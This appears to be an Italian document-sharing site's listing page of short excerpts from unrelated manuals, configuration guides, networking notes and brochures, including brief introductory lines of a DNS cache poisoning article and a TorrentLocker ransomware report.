12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Installazione Modem USB Momo Gestione segnale di rete Connessione Internet Messaggi di errore "Impossibile visualizzare la pagina" o "Pagina

Dettagli

Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis

Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis 2 Intervento immediato con Bosch Intelligent Video Analysis Indipendentemente da quante telecamere il sistema utilizza, la sorveglianza

Dettagli

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux.

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux. FAQ su GeCo Qual è la differenza tra la versione di GeCo con installer e quella portabile?... 2 Esiste la versione per Linux di GeCo?... 2 Quali sono le credenziali di accesso a GeCo?... 2 Ho smarrito

Dettagli

Guida all uso. Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi.

Guida all uso. Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi. Guida all uso Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi. Legenda Singolo = Fax o SMS da inviare ad un singolo destinatario Multiplo = Fax o SMS da inviare a tanti destinatari

Dettagli

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito, semplice da utilizzare e fornisce

Dettagli

ALFABETIZZAZIONE DI BASE Programma del Corso livello base

ALFABETIZZAZIONE DI BASE Programma del Corso livello base Un po di Storia ISP & Web Engineering ALFABETIZZAZIONE DI BASE Programma del Corso livello base Breve cenno sulla storia dell informatica: dagli albori ai giorni nostri; L evoluzione di Windows: dalla

Dettagli

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore)

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Autore: Matteo Veroni Email: matver87@gmail.com Sito web: matteoveroni@altervista.org Fonti consultate: http://openmeetings.apache.org/

Dettagli

Istruzioni per l uso Guida software

Istruzioni per l uso Guida software Istruzioni per l uso Guida software Leggere subito Manuali per questa stampante...8 Preparazione per la stampa Installazione rapida...9 Conferma del metodo di connessione...11 Connessione di rete...11

Dettagli

iphone in azienda Guida alla configurazione per gli utenti

iphone in azienda Guida alla configurazione per gli utenti iphone in azienda Guida alla configurazione per gli utenti iphone è pronto per le aziende. Supporta Microsoft Exchange ActiveSync, così come servizi basati su standard, invio e ricezione di e-mail, calendari

Dettagli

Conferencing Services. Web Meeting. Quick Start Guide V4_IT

Conferencing Services. Web Meeting. Quick Start Guide V4_IT Web Meeting Quick Start Guide V4_IT Indice 1 INFORMAZIONI SUL PRODOTTO... 3 1.1 CONSIDERAZIONI GENERALI... 3 1.2 SISTEMI OPERATIVI SUPPORTATI E LINGUE... 3 1.3 CARATTERISTICHE... 3 2 PRENOTARE UNA CONFERENZA...

Dettagli

Client di Posta Elettronica PECMailer

Client di Posta Elettronica PECMailer Client di Posta Elettronica PECMailer PECMailer è un semplice ma completo client di posta elettronica, ovvero un programma che consente di gestire la composizione, la trasmissione, la ricezione e l'organizzazione

Dettagli

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail Configurare un programma di posta con l account PEC di Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account ii nel programma di

Dettagli

Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione

Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione Access Point WiFi Powerline 500 XWNB5201 - Guida all installazione Assistenza tecnica Grazie per aver scelto i prodotti NETGEAR. Una volta completata l'installazione del dispositivo, individuare il numero

Dettagli

Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS

Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS Suggerimenti forniti da MetaQuotes per l utilizzo di MetaTrader 4 con Mac OS Nonostante esistano già in rete diversi metodi di vendita, MetaQuotes il programmatore di MetaTrader 4, ha deciso di affidare

Dettagli

Di seguito sono descritti i prerequisiti Hardware e Software che deve possedere la postazione a cui viene collegata l Aruba Key.

Di seguito sono descritti i prerequisiti Hardware e Software che deve possedere la postazione a cui viene collegata l Aruba Key. 1 Indice 1 Indice... 2 2 Informazioni sul documento... 3 2.1 Scopo del documento... 3 3 Caratteristiche del dispositivo... 3 3.1 Prerequisiti... 3 4 Installazione della smart card... 4 5 Avvio di Aruba

Dettagli

Gestione crediti formativi Manuale di istruzioni per l utilizzo del sistema

Gestione crediti formativi Manuale di istruzioni per l utilizzo del sistema Guida pratica all utilizzo della gestione crediti formativi pag. 1 di 8 Gestione crediti formativi Manuale di istruzioni per l utilizzo del sistema Gentile avvocato, la presente guida è stata redatta per

Dettagli

Manuale di configurazione per iphone

Manuale di configurazione per iphone Manuale di configurazione per iphone Notariato.it e.net (Iphone 2G e 3G) 2 PREMESSA Il presente manuale ha lo scopo di fornire le indicazioni per la configurazione del terminale IPhone 2G e 3G per ricevere

Dettagli

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account

Dettagli

Guida alla configurazione della posta elettronica. bassanonet.com

Guida alla configurazione della posta elettronica. bassanonet.com Guida alla configurazione della posta elettronica bassanonet.com 02 Guida alla configurazione della posta elettronica I programmi di posta elettronica consentono di gestire una o più caselle e-mail in

Dettagli

I vostri documenti sempre disponibili e sincronizzati.

I vostri documenti sempre disponibili e sincronizzati. gestione documentale I vostri documenti sempre disponibili e sincronizzati. In qualsiasi momento e da qualsiasi parte del mondo accedendo al portale Arxidoc avete la possibilità di ricercare, condividere

Dettagli

Guida all'installazione ed uso dell'app RXCamLink

Guida all'installazione ed uso dell'app RXCamLink Guida all'installazione ed uso dell'app RXCamLink Questa guida riporta i passi relativi all'installazione ed all'utilizzo dell'app "RxCamLink" per il collegamento remoto in mobilità a sistemi TVCC basati

Dettagli

2009 Elite Computer. All rights reserved

2009 Elite Computer. All rights reserved 1 PREMESSA OrisDent 9001 prevede la possibilità di poter gestire il servizio SMS per l'invio di messaggi sul cellulare dei propri pazienti. Una volta ricevuta comunicazione della propria UserID e Password

Dettagli

Le Reti Informatiche

Le Reti Informatiche Le Reti Informatiche modulo 10 Prof. Salvatore Rosta www.byteman.it s.rosta@byteman.it 1 Nomenclatura: 1 La rappresentazione di uno schema richiede una serie di abbreviazioni per i vari componenti. Seguiremo

Dettagli

Inizializzazione degli Host. BOOTP e DHCP

Inizializzazione degli Host. BOOTP e DHCP BOOTP e DHCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Inizializzazione degli Host Un

Dettagli

Manuale - TeamViewer 6.0

Manuale - TeamViewer 6.0 Manuale - TeamViewer 6.0 Revision TeamViewer 6.0 9947c Indice Indice 1 Ambito di applicazione... 1 1.1 Informazioni su TeamViewer... 1 1.2 Le nuove funzionalità della Versione 6.0... 1 1.3 Funzioni delle

Dettagli

Posta Elettronica Certificata

Posta Elettronica Certificata Posta Elettronica Certificata Manuale di utilizzo del servizio Webmail di Telecom Italia Trust Technologies Documento ad uso pubblico Pag. 1 di 33 Indice degli argomenti 1 INTRODUZIONE... 3 1.1 Obiettivi...

Dettagli

Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili

Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili Guida all'installazione del WiFi Booster WN1000RP per dispositivi mobili Sommario Per iniziare............................................ 3 Il WiFi Booster......................................... 4 Pannello

Dettagli

3. nella pagina che verrà visualizzata digitare l indirizzo e-mail che si vuole consultare e la relativa password (come da comunicazione)

3. nella pagina che verrà visualizzata digitare l indirizzo e-mail che si vuole consultare e la relativa password (come da comunicazione) CONFIGURAZIONE DELLA CASELLA DI POSTA ELETTRONICA La consultazione della casella di posta elettronica predisposta all interno del dominio patronatosias.it può essere effettuata attraverso l utilizzo dei

Dettagli

TeamViewer 8 Manuale Controllo remoto

TeamViewer 8 Manuale Controllo remoto TeamViewer 8 Manuale Controllo remoto Rev 8.0-12/2012 TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen www.teamviewer.com Indice 1 Informazioni su TeamViewer... 6 1.1 Informazioni sul software... 6

Dettagli

SAI QUANTO TEMPO IMPIEGHI A RINTRACCIARE UN DOCUMENTO, UN NUMERO DI TELEFONO O UNA E-MAIL?

SAI QUANTO TEMPO IMPIEGHI A RINTRACCIARE UN DOCUMENTO, UN NUMERO DI TELEFONO O UNA E-MAIL? archiviazione ottica, conservazione e il protocollo dei SAI QUANTO TEMPO IMPIEGHI A RINTRACCIARE UN DOCUMENTO, UN NUMERO DI TELEFONO O UNA E-MAIL? Il software Facile! BUSINESS Organizza l informazione

Dettagli

MANUALE SOFTWARE LIVE MESSAGE ISTRUZIONI PER L UTENTE

MANUALE SOFTWARE LIVE MESSAGE ISTRUZIONI PER L UTENTE MANUALE SOFTWARE ISTRUZIONI PER L UTENTE PAGINA 2 Indice Capitolo 1: Come muoversi all interno del programma 3 1.1 Inserimento di un nuovo sms 4 1.2 Rubrica 4 1.3 Ricarica credito 5 PAGINA 3 Capitolo 1:

Dettagli

Deutsche Bank. db Corporate Banking Web Guida al servizio

Deutsche Bank. db Corporate Banking Web Guida al servizio Deutsche Bank db Corporate Banking Web Guida al servizio INDICE 1. INTRODUZIONE... 3 2. SPECIFICHE DI SISTEMA... 4 3 MODALITÀ DI ATTIVAZIONE E DI PRIMO COLLEGAMENTO... 4 3. SICUREZZA... 5 4. AUTORIZZAZIONE

Dettagli

GUIDA DELL UTENTE IN RETE

GUIDA DELL UTENTE IN RETE GUIDA DELL UTENTE IN RETE Memorizza registro di stampa in rete Versione 0 ITA Definizione delle note Nella presente Guida dell'utente viene utilizzata la seguente icona: Le note spiegano come intervenire

Dettagli

MINI GUIDA SINTETICA per l uso della lavagna interattiva multimediale

MINI GUIDA SINTETICA per l uso della lavagna interattiva multimediale MINI GUIDA SINTETICA per l uso della lavagna interattiva multimediale InterWrite SchoolBoard è un software per lavagna elettronica di facile utilizzo. Può essere adoperata anche da studenti diversamente

Dettagli

www.sms2biz.it Soluzioni professionali per la gestione e l invio di SMS

www.sms2biz.it Soluzioni professionali per la gestione e l invio di SMS www.sms2biz.it Soluzioni professionali per la gestione e l invio di SMS Introduzione La nostra soluzione sms2biz.it, Vi mette a disposizione un ambiente web per una gestione professionale dell invio di

Dettagli

Web Solution 2011 EUR

Web Solution 2011 EUR Via Macaggi, 17 int.14 16121 Genova - Italy - Tel. +39 010 591926 /010 4074703 Fax +39 010 4206799 Cod. fisc. e Partita IVA 03365050107 Cap. soc. 10.400,00 C.C.I.A.A. 338455 Iscr. Trib. 58109 www.libertyline.com

Dettagli

TeamViewer 7 Manuale Controllo remoto

TeamViewer 7 Manuale Controllo remoto TeamViewer 7 Manuale Controllo remoto TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen teamviewer.com Indice 1 Informazioni su TeamViewer... 5 1.1 Informazioni sul software... 5 1.2 Informazioni sul

Dettagli

Seagate Access per Personal Cloud Manuale utente

Seagate Access per Personal Cloud Manuale utente Seagate Access per Personal Cloud Manuale utente 2015 Seagate Technology LLC. Tutti i diritti riservati. Seagate, Seagate Technology, il logo Wave e FreeAgent sono marchi depositati o marchi registrati

Dettagli

Aggiornamento del firmware per iphone con connettore Lightning compatibile con AppRadio Mode

Aggiornamento del firmware per iphone con connettore Lightning compatibile con AppRadio Mode Aggiornamento del firmware per iphone con connettore Lightning compatibile con AppRadio Mode Istruzioni sull aggiornamento per i modelli di navigazione: AVIC-F40BT, AVIC-F940BT, AVIC-F840BT e AVIC-F8430BT

Dettagli

DNS cache poisoning e Bind

DNS cache poisoning e Bind ICT Security n. 19, Gennaio 2004 p. 1 di 5 DNS cache poisoning e Bind Il Domain Name System è fondamentale per l'accesso a internet in quanto risolve i nomi degli host nei corrispondenti numeri IP. Se

Dettagli

2 Requisiti di sistema 4 2.1 Requisiti software 4 2.2 Requisiti hardware 5 2.3 Software antivirus e di backup 5 2.4 Impostazioni del firewall 5

2 Requisiti di sistema 4 2.1 Requisiti software 4 2.2 Requisiti hardware 5 2.3 Software antivirus e di backup 5 2.4 Impostazioni del firewall 5 Guida introduttiva Rivedere i requisiti di sistema e seguire i facili passaggi della presente guida per distribuire e provare con successo GFI FaxMaker. Le informazioni e il contenuto del presente documento

Dettagli

Manuale Software. www.smsend.it

Manuale Software. www.smsend.it Manuale Software www.smsend.it 1 INTRODUZIONE 3 Multilanguage 4 PANNELLO DI CONTROLLO 5 Start page 6 Profilo 7 Ordini 8 Acquista Ricarica 9 Coupon AdWords 10 Pec e Domini 11 MESSAGGI 12 Invio singolo sms

Dettagli

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI Firenze, mercoledì 10 Maggio 2011 VERSIONE 1.2 DEL 10 Maggio2011 Pagina 2 di 8 In queste pagine

Dettagli

TorrentLocker Enti Italiani sotto riscatto

TorrentLocker Enti Italiani sotto riscatto Digital Forensics Bureau www.difob.it TorrentLocker Enti Italiani sotto riscatto Paolo DAL CHECCO, Giuseppe DEZZANI Studio DIgital Forensics Bureau di Torino 20 ottobre 2014 Da mercoledì 15 ottobre stiamo

Dettagli

Guida. Vista Live. Controllo. Riproduzione su 24 ore. Ricerca avanz. Le icone includono: Mod. uscita. Icona. Un sensore di allarme.

Guida. Vista Live. Controllo. Riproduzione su 24 ore. Ricerca avanz. Le icone includono: Mod. uscita. Icona. Un sensore di allarme. Guida operatore del registratore TruVision Vista Live Sull immagine live dello schermo vengono visualizzati laa data e l ora corrente, il nome della telecamera e viene indicato se è in corso la registrazione.

Dettagli

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO Precisione del riconoscimento Velocità di riconoscimento Configurazione del sistema Correzione Regolazione della

Dettagli

GUIDA RAPIDA emagister-agora Edizione BASIC

GUIDA RAPIDA emagister-agora Edizione BASIC GUIDA RAPIDA emagister-agora Edizione BASIC Introduzione a emagister-agora Interfaccia di emagister-agora Configurazione dell offerta didattica Richieste d informazioni Gestione delle richieste d informazioni

Dettagli

G e s t i o n e U t e n z e C N R

G e s t i o n e U t e n z e C N R u t e n t i. c n r. i t G e s t i o n e U t e n z e C N R G U I D A U T E N T E Versione 1.1 Aurelio D Amico (Marzo 2013) Consiglio Nazionale delle Ricerche - Sistemi informativi - Roma utenti.cnr.it -

Dettagli

Firma Digitale Remota. Manuale di Attivazione, Installazione,Utilizzo

Firma Digitale Remota. Manuale di Attivazione, Installazione,Utilizzo Firma Digitale Remota Manuale di Attivazione, Installazione,Utilizzo Versione: 0.3 Aggiornata al: 02.07.2012 Sommario 1. Attivazione Firma Remota... 3 1.1 Attivazione Firma Remota con Token YUBICO... 5

Dettagli

Regolamento del concorso a premi denominato 10 Anniversario

Regolamento del concorso a premi denominato 10 Anniversario Regolamento del concorso a premi denominato 10 Anniversario IMPRESE PROMOTRICI GTech S.p.A. con sede legale e amministrativa in Roma, Viale del Campo Boario, 56/d - Partita IVA e Codice Fiscale 08028081001

Dettagli

Outlook Express. Dalla barra del menu in alto, selezionare STRUMENTI e successivamente ACCOUNT :

Outlook Express. Dalla barra del menu in alto, selezionare STRUMENTI e successivamente ACCOUNT : OutlookExpress Dallabarradelmenuinalto,selezionare STRUMENTI esuccessivamente ACCOUNT : Siapriràfinestra ACCOUNTINTERNET. Sceglierelascheda POSTAELETTRONICA. Cliccaresulpulsante AGGIUNGI quindilavoce POSTAELETTRONICA

Dettagli

Energy Studio Manager Manuale Utente USO DEL SOFTWARE

Energy Studio Manager Manuale Utente USO DEL SOFTWARE Energy Studio Manager Manuale Utente USO DEL SOFTWARE 1 ANALYSIS.EXE IL PROGRAMMA: Una volta aperto il programma e visualizzato uno strumento il programma apparirà come nell esempio seguente: Il programma

Dettagli

GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad. (v. 1.0.0 Maggio 2014)

GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad. (v. 1.0.0 Maggio 2014) GUIDA ALLA CONFIGURAZIONE DELLA POSTA iphone/ipad (v. 1.0.0 Maggio 2014) Benvenuto alla guida di configurazione della posta elettronica per dispositivi mobili tipo iphone/ipad. Prima di proseguire, assicurati

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

minilector/usb Risoluzione dei problemi più comuni di malfunzionamento

minilector/usb Risoluzione dei problemi più comuni di malfunzionamento minilector/usb minilector/usb...1 Risoluzione dei problemi più comuni di malfunzionamento...1 1. La segnalazione luminosa (led) su minilector lampeggia?... 1 2. Inserendo una smartcard il led si accende

Dettagli

Programma Servizi Centralizzati s.r.l.

Programma Servizi Centralizzati s.r.l. Via Privata Maria Teresa, 11-20123 Milano Partita IVA 09986990159 Casella di Posta Certificata pecplus.it N.B. si consiglia di cambiare la password iniziale assegnata dal sistema alla creazione della casella

Dettagli

A.P.R.S.* Automatic Position Reporting System

A.P.R.S.* Automatic Position Reporting System A.R.I. Sezione di Reggio Emilia presenta: Introduzione al sistema A.P.R.S.* Automatic Position Reporting System *APRS è un marchio depositato da Bob Bruninga, WB4APR Copyright 2002-03 Alessandro Bondavalli

Dettagli

In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning.

In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning. In questo manuale, si fa riferimento a ipod touch 5a generazione e iphone 5 con il solo termine iphone con connettore Lightning. Per collegare un iphone con connettore Lightning ad SPH-DA100 AppRadio e

Dettagli

ACCREDITAMENTO EVENTI

ACCREDITAMENTO EVENTI E.C.M. Educazione Continua in Medicina ACCREDITAMENTO EVENTI Manuale utente Versione 1.5 Maggio 2015 E.C.M. Manuale utente per Indice 2 Indice Revisioni 4 1. Introduzione 5 2. Accesso al sistema 6 2.1

Dettagli

Regolamento del Concorso a premi Con Penny vinci 20 Toyota Ai sensi dell art. 11 del Decreto del Presidente della Repubblica 26 ottobre 2001 n 430.

Regolamento del Concorso a premi Con Penny vinci 20 Toyota Ai sensi dell art. 11 del Decreto del Presidente della Repubblica 26 ottobre 2001 n 430. Regolamento del Concorso a premi Con Penny vinci 20 Toyota Ai sensi dell art. 11 del Decreto del Presidente della Repubblica 26 ottobre 2001 n 430. Ditta Promotrice Billa Aktiengesellschaft sede secondaria

Dettagli

Articolo. Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai

Articolo. Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai Articolo Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai INDICE Introduzione 3 Dieci cose che il vostro fornitore

Dettagli

Funzioni di base. Manualino OE6. Outlook Express 6

Funzioni di base. Manualino OE6. Outlook Express 6 Manualino OE6 Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito,

Dettagli

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone Paragrafo 1 Prerequisiti Definizione di applicazione server Essa è un servizio che è in esecuzione su un server 1 al fine di essere disponibile per tutti gli host che lo richiedono. Esempi sono: il servizio

Dettagli

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 (marzo 2009) ultimo aggiornamento aprile 2009 Easy Peasy è una distribuzione

Dettagli